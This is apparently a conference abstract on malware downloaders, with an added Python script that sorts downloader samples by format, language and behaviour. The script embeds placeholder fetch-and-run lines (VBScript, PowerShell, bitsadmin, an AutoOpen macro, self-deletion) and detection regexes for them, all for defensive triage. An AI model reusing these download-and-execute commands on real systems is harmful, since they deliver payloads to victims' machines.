Emerging trends in malware downloaders

Dr. Nirmal Singh (Zscaler), Deepen Desai (Zscaler) & Avinash Kumar (Zscaler)
To compromise a system, malicious actors need to avoid being detected at the entry point. Malware infections are increasing exponentially, and so are the attack vectors. Most malware attacks start with a downloader that opens the door for the attack by downloading and installing the malicious modules and payloads. Downloaders are often observed in non-persistent form and delete themselves after installing the malicious payload on the victim's machine. This paper describes the latest trends in downloaders used for malware delivery, leveraging multiple attack vectors to spread advanced malware. The research focuses specifically on malware samples targeting enterprise users.

Through this research, we observed that attackers are targeting users with clever social engineering tricks, while in some cases exploits have also been used to download and install malicious payloads onto victims' machines. A common theme in many of these campaigns is a downloader payload being served first, which performs several checks before delivering the target payload on the compromised machine. To illustrate the trend, we performed a large-scale analysis on a data set of tens of thousands of malicious downloader samples collected in the Zscaler cloud from early 2019 to early 2020. The analysis is organized around a taxonomy based on file formats, scripting languages and behavioural techniques. Our research focused specifically on the downloader payloads used by multiple threat actors in different attack campaigns over the past year.

We will look at the recent tactics, techniques and procedures (TTPs) associated with these malicious downloaders in the wild. We will also showcase details of recent attack campaigns that leverage popular file-hosting services (such as Google Drive, Dropbox and AWS cloud storage) to download malicious modules and payloads.
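As an added illustration of the triage the taxonomy paragraph describes (this is an example written for this page, not the authors' tooling or data set), the Python script below classifies a handful of constructed, deliberately incomplete sample snippets by file format, scripting language and observed downloader behaviour, and pulls out any URL that points at one of the file-hosting services named above. The hosting-service hostnames, the regex heuristics and the sample contents are all assumptions made for the example.

```python
"""Triage helper: build a file-format / scripting-language / behaviour taxonomy
for a batch of suspected downloader samples and surface URLs that point at
popular file-hosting services. Added example, not the paper's own tooling."""
import re
from collections import Counter
from typing import Optional
from urllib.parse import urlparse

# Hostnames for the services named in the abstract; the exact hostnames are
# assumptions for this example, not taken from the paper.
HOSTING_SERVICES = {
    "drive.google.com": "Google Drive",
    "docs.google.com": "Google Drive",
    "dropbox.com": "Dropbox",
    "dl.dropboxusercontent.com": "Dropbox",
    "amazonaws.com": "AWS",
}

# File-format signatures matched against the first bytes of a sample.
MAGIC = [
    (b"MZ", "PE executable"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "OLE2 (legacy Office)"),
    (b"PK\x03\x04", "ZIP / OOXML"),
    (b"%PDF", "PDF"),
]

# Ordered heuristics for the scripting language of text-based samples.
SCRIPT_LANGUAGES = [
    ("PowerShell", re.compile(r"Invoke-WebRequest|New-Object\s+Net\.WebClient|Start-Process", re.I)),
    ("VBScript/VBA", re.compile(r"CreateObject|Sub\s+AutoOpen|MSXML2\.XMLHTTP", re.I)),
    ("JScript", re.compile(r"ActiveXObject", re.I)),
    ("Batch", re.compile(r"^\s*@?echo\s+off|\bbitsadmin\b|\bcertutil\b", re.I | re.M)),
]

# Behaviour tags: fetching a payload, running it, and the self-deletion the
# abstract notes for non-persistent downloaders.
BEHAVIOURS = {
    "downloads-payload": re.compile(r"URLDownloadToFile|DownloadFile|DownloadString|Invoke-WebRequest|XMLHTTP|\bbitsadmin\b|\bcertutil\b", re.I),
    "executes-payload": re.compile(r"Start-Process|WScript\.Shell|Shell\s*\(|\.Run\b|\bIEX\b|Invoke-Expression", re.I),
    "self-deletes": re.compile(r'DeleteFile\s+WScript\.ScriptFullName|del\s+"?%~f0|Remove-Item\s+(-Path\s+)?\$MyInvocation', re.I),
}

# Constructed, non-functional fragments standing in for collected samples.
SAMPLES = {
    "invoice.vbs": (b'Set o = CreateObject("MSXML2.XMLHTTP")\r\n'
                    b'o.Open "GET", "https://drive.google.com/uc?id=EXAMPLE", False\r\n'
                    b'CreateObject("WScript.Shell").Run "%TEMP%\\stage2.exe"\r\n'
                    b'CreateObject("Scripting.FileSystemObject").DeleteFile WScript.ScriptFullName\r\n'),
    "update.ps1": (b'$c = New-Object Net.WebClient\r\n'
                   b'$c.DownloadFile("https://dl.dropboxusercontent.com/s/EXAMPLE/x.bin", "$env:TEMP\\x.bin")\r\n'
                   b'Start-Process "$env:TEMP\\x.bin"\r\n'),
    "run.bat": (b"@echo off\r\n"
                b"bitsadmin /transfer j https://bucket.s3.amazonaws.com/EXAMPLE/a.exe %TEMP%\\a.exe\r\n"
                b'del "%~f0"\r\n'),
    "report.doc": (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24
                   + b'Sub AutoOpen()\r\nURLDownloadToFile 0, "https://example.invalid/p", ...'),
    "setup.exe": b"MZ\x90\x00" + b"\x00" * 60,
}


def classify_format(data: bytes) -> str:
    """Return the container format by magic bytes; anything else is treated as script/text."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    return "script/text"


def classify_script_language(text: str) -> Optional[str]:
    """First matching language heuristic wins (PowerShell before VBScript, etc.)."""
    for name, pattern in SCRIPT_LANGUAGES:
        if pattern.search(text):
            return name
    return None


def extract_hosting_urls(text: str) -> list:
    """Return (service, url) pairs for URLs whose host is a known file-hosting service."""
    hits = []
    for url in re.findall(r"https?://[^\s'\"<>)]+", text):
        host = urlparse(url).hostname or ""
        for suffix, service in HOSTING_SERVICES.items():
            if host == suffix or host.endswith("." + suffix):
                hits.append((service, url))
                break
    return hits


def behaviour_tags(text: str) -> list:
    return [tag for tag, pat in BEHAVIOURS.items() if pat.search(text)]


def analyse(name: str, data: bytes) -> dict:
    # latin-1 is a lossless one-byte decoding, so the regexes also run over binary samples.
    text = data.decode("latin-1")
    return {"name": name, "format": classify_format(data),
            "language": classify_script_language(text),
            "hosting": extract_hosting_urls(text), "behaviours": behaviour_tags(text)}


def build_taxonomy(samples: dict) -> dict:
    """Aggregate per-sample verdicts into the format / language / behaviour / hosting counts."""
    results = [analyse(n, d) for n, d in samples.items()]
    return {
        "by_format": Counter(r["format"] for r in results),
        "by_language": Counter(r["language"] for r in results if r["language"]),
        "by_behaviour": Counter(b for r in results for b in r["behaviours"]),
        "by_hosting": Counter(s for r in results for s, _ in r["hosting"]),
        "results": results,
    }


if __name__ == "__main__":
    taxonomy = build_taxonomy(SAMPLES)
    for key in ("by_format", "by_language", "by_behaviour", "by_hosting"):
        print(key, dict(taxonomy[key]))
```

On the constructed set the script reports three text scripts, one OLE2 document and one PE, four samples that fetch a payload, two that delete themselves, and one hit each for Google Drive, Dropbox and AWS; on real data the hosting-service counter is the quick way to see how much of a downloader corpus relies on legitimate cloud storage rather than attacker-owned infrastructure.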

This research will cover:

  • Case studies of obfuscation techniques used in malicious downloaders written in different file formats.

  • In-depth research on shellcode used as a downloader and decryptor for several pieces of advanced malware.

  • Techniques used by downloaders to evade detection.

  • Exploitation techniques used by threat actors specifically in conjunction with downloaders.

  • Challenges in detection and attribution of malicious vs. legitimate downloaders.
Dr. Nirmal Singh
Zscaler

Nirmal Singh is Senior Manager for the security research team at Zscaler ThreatLabZ, located in Chandigarh, India. Nirmal has a Ph.D. in computer science and has been working in the threat research and analysis field for the past 10 years. He oversees malware research, detection and innovation at Zscaler. Prior to Zscaler, he worked at Norman as a manager for the threat response team.

Deepen Desai
Zscaler

Deepen Desai is responsible for running the security research operations at Zscaler ThreatLabZ. Deepen has been actively involved in the field of threat research and analysis for the past 15 years and has strong affiliations with various security working groups. He is passionate about finding and reverse engineering new malware payloads to neutralize the threat with effective countermeasures. Prior to joining Zscaler, he was a senior threat research manager at Dell SonicWALL. Deepen holds a Master of Science in computer engineering from San Jose State University.

Avinash Kumar
Zscaler

Avinash Kumar works at Zscaler ThreatLabZ as a senior security researcher. He has worked in the threat research field for more than nine years. He previously worked at Norman and Genpact as a senior malware analyst. His research areas include malware downloaders used by advanced malware botnets and the analysis of the various campaigns seen on a daily basis. Avinash holds a Master's degree in computer applications from Punjab Technical University. Apart from malware research, he loves to play cricket and table tennis.